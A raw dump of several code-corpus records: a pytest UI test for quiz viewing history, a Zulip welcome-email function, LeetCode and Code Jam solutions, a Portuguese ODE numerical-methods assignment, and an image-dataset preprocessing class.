-> Open KEA -> Create new quiz -> Go to My History -> Check that quiz entry isn't displayed ->\n # Play entry -> Go to My History page and make sure that entry exists in page Go to home page and make sure entry displayed in recently watched list-> \n # test cleanup: deleting the uploaded file\n #================================================================================================================================\n testNum = \"2757\"\n enableProxy = False\n \n supported_platforms = clsTestService.updatePlatforms(testNum)\n \n status = \"Pass\"\n timeout_accured = \"False\"\n driver = None\n common = None\n # Test variables\n entryName= None\n entryNameQuiz = None\n questionNumber = 1\n entryDescription = \"description\"\n entryTags = \"tag1,\"\n playlist = 'Recently Watched '\n QuizQuestion1 = 'First question'\n QuizQuestion1Answer1 = 'First answer'\n QuizQuestion1AdditionalAnswers = ['Second answer', 'Third question', 'Fourth question']\n filePath = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\\videos\\10sec_QR_mid_right.mp4'\n \n #run test as different instances on all the supported platforms\n @pytest.fixture(scope='module',params=supported_platforms)\n def driverFix(self,request):\n return request.param\n \n def test_01(self,driverFix,env):\n\n try:\n logStartTest(self,driverFix)\n ############################# TEST SETUP ###############################\n #capture test start time\n self.startTime = time.time()\n #initialize all the basic vars and start playing\n self,self.driver = clsTestService.initializeAndLoginAsUser(self, driverFix)\n self.common = Common(self.driver) \n ########################################################################\n self.entryName = clsTestService.addGuidToString('MyHistoryRecentlyWatchedAudio', self.testNum)\n ########################## TEST STEPS - MAIN FLOW ####################### \n self.entryName = clsTestService.addGuidToString('MyHistoryQuizEntry')\n self.entryNameQuiz = self.entryName + \" - Quiz\"\n self.entriesNames = [self.entryName, self.entryNameQuiz]\n ######################### TEST STEPS - MAIN FLOW #######################\n writeToLog(\"INFO\",\"Step 1: Going to upload video entry\")\n if self.common.upload.uploadEntry(self.filePath, self.entryName, self.entryDescription, self.entryTags, disclaimer=False) == None:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 1: FAILED failed to upload video entry\")\n return\n \n writeToLog(\"INFO\",\"Step 2: Going to navigate to uploaded entry page\")\n if self.common.entryPage.navigateToEntry(navigateFrom = enums.Location.UPLOAD_PAGE) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 2: FAILED to navigate to entry page\")\n return \n \n writeToLog(\"INFO\",\"Step 3: Going to wait until media will finish processing\")\n if self.common.entryPage.waitTillMediaIsBeingProcessed() == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 3: FAILED - New entry is still processing\")\n return\n \n writeToLog(\"INFO\",\"Step 4: Going to navigate to add new video quiz\")\n if self.common.upload.addNewVideoQuiz() == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 4: FAILED to click video quiz\")\n return \n \n writeToLog(\"INFO\",\"Step 5: Going to search the uploaded entry and open KEA\")\n if self.common.kea.searchAndSelectEntryInMediaSelection(self.entryName, False) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 5: FAILED to find entry and open KEA\")\n return \n \n writeToLog(\"INFO\",\"Step 6: Going to start quiz and add questions\")\n if self.common.kea.addQuizQuestion(self.QuizQuestion1, self.QuizQuestion1Answer1, self.QuizQuestion1AdditionalAnswers) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 6: FAILED to start quiz and add questions\")\n return \n \n writeToLog(\"INFO\",\"Step 7: Going to save quiz and navigate to media page\")\n if self.common.kea.clickDone() == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 7: FAILED to save quiz and navigate to media page\")\n return \n sleep(5) \n writeToLog(\"INFO\",\"Step 8: Going to Search quiz entry in My History page\")\n if self.common.myHistory.waitTillLocatorExistsInMyHistory(self.entryNameQuiz) == True:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 8: FAILED - New entry is displayed in my history page\")\n return \n writeToLog(\"INFO\",\"Step 8: Previous Step Failed as Expected - The entry should not be displayed\") \n \n writeToLog(\"INFO\",\"Step 9: Going to play entry\")\n if self.common.player.navigateToQuizEntryAndClickPlay(self.entryNameQuiz, self.questionNumber) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 9: FAILED to navigate and play entry\")\n return \n \n writeToLog(\"INFO\",\"Step 10: Going to switch to default content\")\n if self.common.base.switch_to_default_content() == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 10: FAILED to switch to default content\")\n return \n \n writeToLog(\"INFO\",\"Step 11: Going to navigate to my history and check for entry\")\n if self.common.myHistory.waitTillLocatorExistsInMyHistory(self.entryNameQuiz) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 11: FAILED find entry in my history\")\n return \n sleep(5)\n writeToLog(\"INFO\",\"Step 12: Going to navigate to home page and check entry in recently watched list\")\n if self.common.home.checkEntryInHomePlaylist(self.playlist, self.entryName) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 12: FAILED to find entry in recently watched list\")\n return \n #########################################################################\n writeToLog(\"INFO\",\"TEST PASSED\")\n # If an exception happened we need to handle it and fail the test \n except Exception as inst:\n self.status = clsTestService.handleException(self,inst,self.startTime)\n \n ########################### TEST TEARDOWN ########################### \n def teardown_method(self,method):\n try:\n self.common.handleTestFail(self.status) \n writeToLog(\"INFO\",\"**************** Starting: teardown_method **************** \")\n self.common.myMedia.deleteSingleEntryFromMyMedia(self.entryName)\n writeToLog(\"INFO\",\"**************** Ended: teardown_method *******************\")\n except:\n pass \n clsTestService.basicTearDown(self)\n #write to log we finished the test\n logFinishedTest(self,self.startTime)\n assert (self.status == \"Pass\") \n\n pytest.main('test_' + testNum + '.py --tb=line')\n","sub_path":"web/tests/myHistory/test_2757.py","file_name":"test_2757.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"52862599","text":"\n\ndef enqueue_welcome_emails(user: UserProfile) -> None:\n from zerver.context_processors import common_context\n if (settings.WELCOME_EMAIL_SENDER is not None):\n from_name = settings.WELCOME_EMAIL_SENDER['name']\n from_address = settings.WELCOME_EMAIL_SENDER['email']\n else:\n from_name = None\n from_address = FromAddress.SUPPORT\n unsubscribe_link = one_click_unsubscribe_link(user, 'welcome')\n context = common_context(user)\n context.update({\n 'unsubscribe_link': unsubscribe_link,\n 'organization_setup_advice_link': (user.realm.uri + '%s/help/getting-your-organization-started-with-zulip'),\n 'is_realm_admin': user.is_realm_admin,\n })\n send_future_email('zerver/emails/followup_day1', user.realm, to_user_id=user.id, from_name=from_name, from_address=from_address, context=context)\n send_future_email('zerver/emails/followup_day2', user.realm, to_user_id=user.id, from_name=from_name, from_address=from_address, context=context, delay=datetime.timedelta(days=1))\n","sub_path":"Data Set/bug-fixing-1/e2a42650c9b067869c50247c7945ef847fbbf806--bug.py","file_name":"e2a42650c9b067869c50247c7945ef847fbbf806--bug.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"542088995","text":"# https://leetcode.com/problems/task-scheduler/submissions/\n# General Explanation: https://www.youtube.com/watch?v=s8p8ukTyA2I\n\"\"\"\nHeap sort with greedy algorithm\n一般如果要求最大数,最小数,满足某些情况(比如所有字符不相邻的排列组合)这种题目,考虑使用heapsort + greedy\nRelated:\nTask Scheduler\nReorganize String\nMeeting Rooms\n\"\"\"\nclass Solution:\n def leastInterval(self, tasks: List[str], n: int) -> int:\n count = Counter(tasks)\n maxHeap = [-cnt for cnt in count.values()]\n heapq.heapify(maxHeap)\n q = deque()\n time = 0\n while maxHeap or q:\n time += 1\n if maxHeap:\n cnt = heapq.heappop(maxHeap) + 1\n if cnt:\n q.append((cnt, time + n))\n if q and q[0][1] == time:\n heapq.heappush(maxHeap, q.popleft()[0])\n return time","sub_path":"most_interviewed/heap/task_scheduler.py","file_name":"task_scheduler.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"111323329","text":"#!/usr/bin/python3\n\nimport scipy as sp # noqa\nimport math # noqa\n\n\ndef next_line_to_ints(lines):\n return map(int, next(lines).split(' '))\n\n# Don't check stuff that is not divisable by something smaller than 8000\nmax_checked = 8000\n\n\ndef first_divisor(n):\n \"\"\"\n Returns None if prime otherwise first divisor\n \"\"\"\n max_divisor = math.sqrt(n)\n\n # Not needed since it is uneven\n # if n == 2:\n # return None\n # if n % 2 == 0:\n # return 2\n\n d = 3\n while d <= max_divisor and d < max_checked:\n if n % d == 0:\n return d\n d += 2\n return None\n\nf_in = open('c.in')\nf_out = open('c.out', 'w')\n\nlines = (i for i in f_in.read().splitlines())\nt = int(next(lines))\n\nn, j = tuple(next_line_to_ints(lines))\n\nf_out.write('Case #1:\\n')\n\nfor i in range(2**(n-2)):\n s = \"1{}1\".format(format(i, '030b'))\n\n divisors = []\n\n for base in range(2, 11):\n div = first_divisor(int(s, base))\n\n if div is None:\n break\n\n divisors.append(div)\n\n else:\n j -= 1\n output = '{} {}\\n'.format(s, ' '.join(map(str, divisors)))\n f_out.write(output)\n print(j, output)\n\n if j == 0:\n break\n","sub_path":"codes/CodeJamCrawler/16_0_3/JelteF/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"98769023","text":"# -*- coding: utf-8 -*-\r\n\"\"\" \r\nMAP5725 - Prof. Alexandre Roma\r\nAluna: Karina Yukimi Peixoto Sakurai - 9796634\r\nTarefa 2\r\n\"\"\"\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\ndef phi_Euler(t,y,dt,f): # Função de discretização do Método de Euler\r\n \r\n k1 = f(t, y)\r\n \r\n return k1\r\n\r\ndef phi_EulerImplicito(t,y,dt,f): # Função de discretização do Método de Euler Implícito\r\n \r\n A = np.array([[0,1],[-4*(t**2), 1/t]])\r\n I = np.array([[1,0],[0, 1]])\r\n M = I - dt*A\r\n k1 = f(t + dt, np.linalg.inv(M).dot(y))\r\n \r\n return k1\r\n\r\ndef phi_Trapezio(t,y,dt,f): # Função de discretização do Método do Trapézio\r\n \r\n k1 = f(t, y)\r\n A = np.array([[0,1],[-4*(t**2), 1/t]])\r\n I = np.array([[1,0],[0, 1]])\r\n M = I - (dt/2)*A\r\n N = I + (dt/2)*A\r\n k2 = f(t+dt, np.linalg.inv(M).dot(N).dot(y))\r\n \r\n return (k1 + k2)/2\r\n\r\ndef f(t, y):\r\n \r\n f0 = y[1]\r\n f1 = y[1]/t - 4*(t**2)*y[0]\r\n \r\n return np.array([f0,f1])\r\n\r\ndef sol_exata(t): # Função que calcula a solução exata para um t específico\r\n\r\n sol = np.array([math.sin(t**2), 2*t*math.cos(t**2)])\r\n \r\n return sol\r\n\r\n#Lendo comandos\r\nprint(\"Tarefa 2 \\n\")\r\nprint(\"Opções disponíveis: \\n\")\r\n\r\nprint(\"** Métodos Numéricos: **\\n\")\r\n\r\nprint(\"-> Digite '1' para Método de Euler\")\r\nprint(\"-> Digite '2' para Método de Euler Implícito\")\r\nprint(\"-> Digite '3' para Método do Trapézio\")\r\nprint(\"-> Digite '4' para gerar um gráfico comparativo de métodos e solução exata \\n\")\r\n\r\nprint(\"** Tabela de convergência e erro de discretização: **\\n\")\r\n\r\nprint(\"-> Digite '5' para gerar tabela para o Método de Euler\")\r\nprint(\"-> Digite '6' para gerar tabela para o Método de Euler Implícito\")\r\nprint(\"-> Digite '7' para gerar tabela para o Método do Trapézio \\n\")\r\n\r\nprint(\"** Gráficos com aproximações numéricas para diferentes valores de dt: **\\n\")\r\nprint(\"-> Digite '8' para gerar aproximações usando o Método de Euler\")\r\nprint(\"-> Digite '9' para gerar aproximações usando o Método de Euler Implícito\")\r\nprint(\"-> Digite '10' para gerar aproximações usando o Método do Trapézio\")\r\n\r\nprint(\"** CASO 2: Problema de Cauchy Genérico\\n\")\r\n\r\nprint(\"-> Digite '11' para gerar tabela para o Método de Euler\")\r\nprint(\"-> Digite '12' para gerar tabela para o Método de Euler Implícito\")\r\nprint(\"-> Digite '13' para gerar tabela para o Método do Trapézio \\n\")\r\n\r\nopcao = input()\r\n\r\nt_n = [math.sqrt(math.pi)]; T = 10; # Intervalo de tempo\r\ny_n = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n\r\n#Estes vetores serão utilizados caso a opção '4' for selecionada\r\ny_n1 = [np.array([0,-2*math.sqrt(math.pi)])]\r\ny_n2 = [np.array([0,-2*math.sqrt(math.pi)])]\r\ny_n3 = [np.array([0,-2*math.sqrt(math.pi)])]\r\ny_exata = [np.array([0,-2*math.sqrt(math.pi)])]\r\n\r\nn = 2**17 # Discretização do intervalo de tempo\r\ndt = (T-t_n[-1])/n\r\n\r\nif (opcao != '1' and opcao != '2' and opcao != '3' and opcao != '4' and opcao != '5' and opcao != '6' and opcao != '7'\r\n and opcao != '8' and opcao != '9' and opcao != '10' and opcao != '11' and opcao != '12' and opcao != '13'):\r\n \r\n print(\"Entrada inválida. Fim do programa.\")\r\n \r\nelse:\r\n \r\n opcao = int(opcao)\r\n\r\n # *********** Opções 1, 2, 3 e 4 ***********\r\n\r\n if (opcao <= 4): \r\n \r\n while t_n[-1] < T:\r\n \r\n y = 0\r\n \r\n if (opcao == 1):\r\n \r\n y = y_n[-1] + dt*phi_Euler(t_n[-1],y_n[-1],dt,f) #Chamada Método de Euler\r\n y_n.append(y)\r\n \r\n elif (opcao == 2):\r\n \r\n y = y_n[-1] + dt*phi_EulerImplicito(t_n[-1],y_n[-1],dt,f) #Chamada Método de Euler Implícito\r\n y_n.append(y)\r\n \r\n elif (opcao == 3):\r\n \r\n y = y_n[-1] + dt*phi_Trapezio(t_n[-1],y_n[-1],dt,f) #Chamada Método do Trapézio\r\n y_n.append(y) \r\n\r\n elif (opcao == 4):\r\n #Neste caso foi escolhido o método 4, os 3 métodos serão gerados simultaneamente. \r\n y_n1.append(y_n1[-1] + dt*phi_Euler(t_n[-1],y_n1[-1],dt,f))\r\n y_n2.append(y_n2[-1] + dt*phi_EulerImplicito(t_n[-1],y_n2[-1],dt,f))\r\n y_n3.append(y_n3[-1] + dt*phi_Trapezio(t_n[-1],y_n3[-1],dt,f))\r\n y_exata.append(sol_exata(t_n[-1]))\r\n\r\n t_n.append(t_n[-1] + dt)\r\n dt = min(dt, T-t_n[-1])\r\n\r\n if (t_n[-1] == T):\r\n aprox = y\r\n\r\n if (opcao != 4): # Opções 1, 2 e 3\r\n\r\n y_n = np.array(y_n)\r\n \r\n # Plotando gráfico de x em função de t\r\n plt.plot(t_n, y_n[:,0], 'k-.', markersize=0.1)\r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('x(t)')\r\n if (opcao == 1):\r\n plt.title('Método de Euler - Gráfixo x(t)')\r\n elif (opcao == 2):\r\n plt.title('Método de Euler Implícito - Gráfico x(t)')\r\n else:\r\n plt.title('Método do Trapézio - Gráfixo x(t)')\r\n plt.show()\r\n\r\n # Plotando gráfico de y em função de t\r\n plt.plot(t_n, y_n[:,1], 'k-.', markersize=0.1)\r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('y(t)')\r\n if (opcao == 1):\r\n plt.title('Método de Euler - Gráfixo y(t)')\r\n elif (opcao == 2):\r\n plt.title('Método de Euler Implícito - Gráfico y(t)')\r\n else:\r\n plt.title('Método do Trapézio - Gráfixo y(t)')\r\n plt.show()\r\n\r\n else: # Opção 4\r\n\r\n y_n1 = np.array(y_n1)\r\n y_n2 = np.array(y_n2)\r\n y_n3 = np.array(y_n3)\r\n y_exata = np.array(y_exata)\r\n\r\n # Plotando gráfico de x em função de t\r\n plt.plot(t_n, y_n1[:,0], 'k--', markersize=0.1, label = 'Euler')\r\n plt.plot(t_n, y_n2[:,0], 'k-.', markersize=0.1, label = 'Euler Implícito')\r\n plt.plot(t_n, y_n3[:,0], 'k+', markersize=0.1, label = 'Trapézio')\r\n plt.plot(t_n, y_exata[:,0], 'k-', markersize=0.1, label = 'Solução Exata')\r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('x(t)')\r\n plt.title('Comparativos de Métodos n = 2**17 - Gráfixo x(t)')\r\n plt.show()\r\n\r\n # Plotando gráfico de y em função de t\r\n plt.plot(t_n, y_n1[:,1], 'k--', markersize=0.1, label = 'Euler')\r\n plt.plot(t_n, y_n2[:,1], 'k-.', markersize=0.1, label = 'Euler Implícito')\r\n plt.plot(t_n, y_n3[:,1], 'k+', markersize=0.1, label = 'Trapézio')\r\n plt.plot(t_n, y_exata[:,1], 'k-', markersize=0.1, label = 'Solução Exata')\r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('y(t)')\r\n plt.title('Comparativos de Métodos n = 2**17 - Gráfixo y(t)')\r\n plt.show()\r\n\r\n # *********** Opções 5, 6 e 7: Gerar tabelas de convergência e erro de discretização global *********** \r\n\r\n if (opcao >= 5 and opcao <= 7):\r\n\r\n potencia = [2,5,10,15,18]\r\n linha = []\r\n erro = 0\r\n erro2 = 0\r\n \r\n for item in potencia:\r\n n = 2**item\r\n t_n = [math.sqrt(math.pi)]; T = 10; # Intervalo de tempo\r\n y_n = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n y_exata = [np.array([0,-2*math.sqrt(math.pi)])]\r\n dt = (T-t_n[-1])/n\r\n \r\n while t_n[-1] < T:\r\n if (opcao == 5):\r\n \r\n y_n.append(y_n[-1] + dt*phi_Euler(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando Euler\r\n \r\n elif (opcao == 6):\r\n \r\n y_n.append(y_n[-1] + dt*phi_EulerImplicito(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando Euler Implícito\r\n \r\n elif (opcao == 7):\r\n \r\n y_n.append(y_n[-1] + dt*phi_Trapezio(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando o método do trapezio \r\n\r\n y_exata.append(sol_exata(t_n[-1]))\r\n t_n.append(t_n[-1] + dt)\r\n dt = min(dt, T-t_n[-1])\r\n\r\n # Para cálculo da ordem de convergência\r\n t_n2 = [math.sqrt(math.pi)]; T = 10; # Intervalo de tempo\r\n y_n2 = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n dt = (T-t_n2[-1])/n\r\n dt = 2*dt\r\n\r\n while t_n2[-1] < T:\r\n if (opcao == 5):\r\n \r\n y_n2.append(y_n2[-1] + dt*phi_Euler(t_n2[-1],y_n2[-1],dt,f)) # Cálculo de y usando Euler\r\n \r\n elif (opcao == 6):\r\n \r\n y_n2.append(y_n2[-1] + dt*phi_EulerImplicito(t_n2[-1],y_n2[-1],dt,f)) # Cálculo de y usando Euler Implícito\r\n \r\n elif (opcao == 7):\r\n \r\n y_n2.append(y_n2[-1] + dt*phi_Trapezio(t_n2[-1],y_n2[-1],dt,f)) # Cálculo de y usando o método do trapezio\r\n \r\n t_n2.append(t_n2[-1] + dt)\r\n dt = min(dt, T-t_n2[-1])\r\n \r\n erro = y_exata[len(y_exata) - 1] - y_n[len(y_n) - 1]\r\n erro2 = y_n2[len(y_n2) - 1] - y_n[len(y_n) - 1]\r\n q = erro2/erro\r\n linha.append([n, dt, \"{:.2e}\".format(abs(erro[0])), \"{:.2e}\".format(abs(erro2[1])), \"{:.2e}\".format(abs(q[0])), \"{:.2e}\".format(abs(q[1]))])\r\n \r\n linha = np.array(linha)\r\n print(\"n ----- dt ----- erro_x ---- erro_y ---- q_x ---- q_y\")\r\n print(linha)\r\n \r\n # *********** Métodos 8, 9 e 10 ***********\r\n\r\n if (opcao >= 8 and opcao <= 10):\r\n\r\n potencia = [12, 15, 18] # Potências utilizadas no cálculo de n (número de passos)\r\n dados = [] # Variável que vai armazenar listas de y para cada n\r\n estilo = [\"k:\",\"k-.\",\"k--\"] # Estilo de linhas para os gráficos \r\n\r\n _y = []\r\n _t = []\r\n \r\n for item in potencia:\r\n\r\n t_n = [math.sqrt(math.pi)]; T = 10; # Inicializando intervalo de tempo\r\n y_n = [np.array([0,-2*math.sqrt(math.pi)])] # Inicializando condições iniciais (x0, y0)\r\n n = 2**item # Número de passos de iteração (discretização do intervalo)\r\n dt = (T-t_n[-1])/n # Tamanho do passo de iteração\r\n y = 0 # Inicialização da variável y\r\n \r\n while t_n[-1] < T:\r\n \r\n if (opcao == 8):\r\n \r\n y = y_n[-1] + dt*phi_Euler(t_n[-1],y_n[-1],dt,f) # Chamada método Euler para cálculo de y_{n+1}\r\n \r\n elif (opcao == 9):\r\n \r\n y = y_n[-1] + dt*phi_EulerImplicito(t_n[-1],y_n[-1],dt,f) # Chamada método Euler Implícito para cálculo de y_{n+1}\r\n \r\n elif (opcao == 10):\r\n \r\n y = y_n[-1] + dt*phi_Trapezio(t_n[-1],y_n[-1],dt,f) # Chamada método do trapézio para cálculo de y_{n+1}\r\n\r\n y_n.append(y) # Adicionando y calculado na lista de valores de y\r\n t_n.append(t_n[-1] + dt) # Adicionando t atual na lista de valores de t\r\n dt = min(dt, T-t_n[-1]) \r\n\r\n _y.append(y_n)\r\n _t.append(t_n)\r\n\r\n legenda = \"\"\r\n\r\n # Plotando gráfico de x em função de t\r\n for item in range(len(potencia)):\r\n\r\n y_n = _y[item]\r\n t_n = _t[item]\r\n y_n = np.array(y_n)\r\n pot = str(potencia[item])\r\n legenda = \"n = 2**\"+pot\r\n\r\n plt.plot(t_n, y_n[:,0], estilo[item], label = legenda, markersize=0.1) \r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('x(t)')\r\n plt.legend(loc='upper left')\r\n if (opcao == 8):\r\n legenda = \"Euler\"\r\n plt.title('Método de Euler - Gráfixo x(t)')\r\n elif (opcao == 9):\r\n legenda = \"Euler Implícito\"\r\n plt.title('Método de Euler Implícito - Gráfico x(t)')\r\n else:\r\n legenda = \"Trapézio\"\r\n plt.title('Método do Trapézio - Gráfixo x(t)')\r\n \r\n plt.show()\r\n\r\n # Plotando gráfico de x em função de t\r\n for item in range(len(potencia)):\r\n\r\n y_n = _y[item]\r\n t_n = _t[item]\r\n y_n = np.array(y_n)\r\n pot = str(potencia[item])\r\n legenda = \"n = 2**\"+pot\r\n\r\n plt.plot(t_n, y_n[:,1], estilo[item], label = legenda, markersize=0.1) \r\n plt.xlabel('t (em unidades de tempo)')\r\n plt.ylabel('y(t)')\r\n plt.legend(loc='upper left')\r\n if (opcao == 8):\r\n legenda = \"Euler\"\r\n plt.title('Método de Euler - Gráfixo y(t)')\r\n elif (opcao == 9):\r\n legenda = \"Euler Implícito\"\r\n plt.title('Método de Euler Implícito - Gráfico y(t)')\r\n else:\r\n legenda = \"Trapézio\"\r\n plt.title('Método do Trapézio - Gráfixo y(t)')\r\n \r\n plt.show()\r\n \r\n# *********** Opções 11, 12 e 13: CASO 2 - Problema de Cauchy Genérico *********** \r\n\r\n if (opcao >= 11 and opcao <= 13):\r\n\r\n potencia = [2,5,10,15,18]\r\n linha = []\r\n \r\n for item in potencia:\r\n n = 2**item\r\n t_n = [math.sqrt(math.pi)]; # Intervalo de tempo\r\n y_n = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n y_exata = [np.array([0,-2*math.sqrt(math.pi)])]\r\n dt = (T-t_n[-1])/n\r\n \r\n while t_n[-1] < T:\r\n if (opcao == 11):\r\n \r\n y_n.append(y_n[-1] + dt*phi_Euler(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando Euler\r\n \r\n elif (opcao == 12):\r\n \r\n y_n.append(y_n[-1] + dt*phi_EulerImplicito(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando Euler Implícito\r\n \r\n elif (opcao == 13):\r\n \r\n y_n.append(y_n[-1] + dt*phi_Trapezio(t_n[-1],y_n[-1],dt,f)) # Cálculo de y usando o método do trapezio \r\n\r\n t_n.append(t_n[-1] + dt)\r\n dt = min(dt, T-t_n[-1])\r\n # Para cálculo da ordem de convergência\r\n t_n2 = [math.sqrt(math.pi)]; # Intervalo de tempo\r\n y_n2 = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n t_nMeio = [math.sqrt(math.pi)]; # Intervalo de tempo\r\n y_nMeio = [np.array([0,-2*math.sqrt(math.pi)])] # Condições iniciais (x0, y0)\r\n dt2 = 2*(T-t_n2[-1])/n\r\n dtMeio = (T-t_n2[-1])/(2*n)\r\n while t_n2[-1] < T:\r\n if (opcao == 11):\r\n \r\n y_n2.append(y_n2[-1] + dt2*phi_Euler(t_n2[-1],y_n2[-1],dt2,f)) # Cálculo de y usando Euler\r\n \r\n elif (opcao == 12):\r\n \r\n y_n2.append(y_n2[-1] + dt2*phi_EulerImplicito(t_n2[-1],y_n2[-1],dt2,f)) # Cálculo de y usando Euler Implícito\r\n \r\n elif (opcao == 13):\r\n \r\n y_n2.append(y_n2[-1] + dt2*phi_Trapezio(t_n2[-1],y_n2[-1],dt2,f)) # Cálculo de y usando o método do trapezio\r\n \r\n t_n2.append(t_n2[-1] + dt2)\r\n dt2 = min(dt2, T-t_n2[-1])\r\n\r\n while t_nMeio[-1] < T:\r\n if (opcao == 11):\r\n\r\n y_nMeio.append(y_nMeio[-1] + dtMeio*phi_Euler(t_nMeio[-1],y_nMeio[-1],dtMeio,f))\r\n \r\n elif (opcao == 12):\r\n\r\n y_nMeio.append(y_nMeio[-1] + dtMeio*phi_EulerImplicito(t_nMeio[-1],y_nMeio[-1],dtMeio,f))\r\n \r\n elif(opcao == 13):\r\n\r\n y_nMeio.append(y_nMeio[-1] + dtMeio*phi_Trapezio(t_nMeio[-1],y_nMeio[-1],dtMeio,f))\r\n \r\n t_nMeio.append(t_nMeio[-1] + dtMeio)\r\n dtMeio = min(dtMeio, T-t_nMeio[-1])\r\n\r\n\r\n numerador = y_n2[len(y_n2) - 1] - y_n[len(y_n) - 1]\r\n denominador = y_n[len(y_n) - 1] - y_nMeio[len(y_nMeio) - 1]\r\n \r\n resx = abs(numerador[0]/denominador[0])\r\n px = math.log(resx, 2) #Cálculo da ordem de convergência aprox na variável x\r\n \r\n resy = abs(numerador[1]/denominador[1])\r\n py = math.log(resy, 2) #Cálculo da ordem de convergência aprox na variavel y\r\n \r\n linha.append([item, n, dt, \"{:.2e}\".format(y_n[len(y_n) - 1][0]), \"{:.2e}\".format(y_n[len(y_n) - 1][1]), \"{:.2e}\".format(px), \"{:.2e}\".format(py)])\r\n \r\n linha = np.array(linha)\r\n print(\"m ----- n = 2^m ----- dt ----- \\eta_x ----- \\eta_y ---- px ----- py\")\r\n print(linha)\r\n","sub_path":"codigo-completo.py","file_name":"codigo-completo.py","file_ext":"py","file_size_in_byte":19193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294423016","text":"import os\nfrom matplotlib.image import imread\nimport numpy as np\n\n\nclass PreProcessing:\n\n images_train = np.array([])\n images_test = np.array([])\n labels_train = np.array([])\n labels_test = np.array([])\n unique_train_label = np.array([])\n map_train_label_indices = dict()\n\n def __init__(self,data_src, dataMode):\n self.data_src = data_src\n self.data_mode = dataMode\n print(\"Loading Geological Similarity Dataset...\")\n self.images, self.labels = self.preprocessing()\n self.unique_label = np.unique(self.labels)\n self.map_label_indices = {label: np.flatnonzero(self.labels == label) for label in\n self.unique_label}\n print('Preprocessing Done. Summary:')\n print(\"Images :\", self.images.shape)\n print(\"Labels :\", self.labels.shape)\n print(\"Unique label :\", self.unique_label)\n\n def normalize(self,x):\n min_val = np.min(x)\n max_val = np.max(x)\n x = (x - min_val) / (max_val - min_val)\n return x\n\n def read_dataset(self):\n X = []\n y = []\n minDirectory = 0\n maxDirectory = 100\n if self.data_mode == \"training\":\n minDirectory = 0\n maxDirectory = 64\n elif self.data_mode == \"validation\":\n minDirectory = 65\n maxDirectory = 84\n elif self.data_mode == \"test\":\n minDirectory = 85\n maxDirectory = 100\n print(\"Setting min directory to %d and max directory to %d in data mode %s\" %(minDirectory, maxDirectory, self.data_mode))\n for directory in os.listdir(self.data_src):\n if directory.startswith(\".\"):\n continue\n # pick which directories you would like to read based on data mode\n if int(directory) < minDirectory or int(directory) > maxDirectory:\n continue\n try:\n for pic in os.listdir(os.path.join(self.data_src, directory)):\n img = imread(os.path.join(self.data_src, directory, pic))\n X.append(np.squeeze(np.asarray(img)))\n y.append(directory)\n except Exception as e:\n print('Failed to read images from Directory: ', directory)\n print('Exception Message: ', e)\n print('Dataset loaded successfully.')\n return X,y\n\n def preprocessing(self):\n X, y = self.read_dataset()\n labels = list(set(y))\n label_dict = dict(zip(labels, range(len(labels))))\n Y = np.asarray([label_dict[label] for label in y])\n X = [self.normalize(x) for x in X] # normalize images\n\n shuffle_indices = np.random.permutation(np.arange(len(y)))\n x_shuffled = []\n y_shuffled = []\n for index in shuffle_indices:\n x_shuffled.append(X[index])\n y_shuffled.append(Y[index])\n\n return np.asarray(x_shuffled), np.asarray(y_shuffled)\n\n\n def get_triplets(self):\n label_l, label_r = np.random.choice(self.unique_label, 2, replace=False)\n a, p = np.random.choice(self.map_label_indices[label_l],2, replace=False)\n n = np.random.choice(self.map_label_indices[label_r])\n return a, p, n\n\n def get_triplets_batch(self,n):\n idxs_a, idxs_p, idxs_n = [], [], []\n for _ in range(n):\n a, p, n = self.get_triplets()\n idxs_a.append(a)\n idxs_p.append(p)\n idxs_n.append(n)\n return self.images[idxs_a,:], self.images[idxs_p, :], self.images[idxs_n, :]\n\n","sub_path":"class_based_preprocessing.py","file_name":"class_based_preprocessing.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"94862350","text":"from cacheReal import *\nimport argparse\nimport 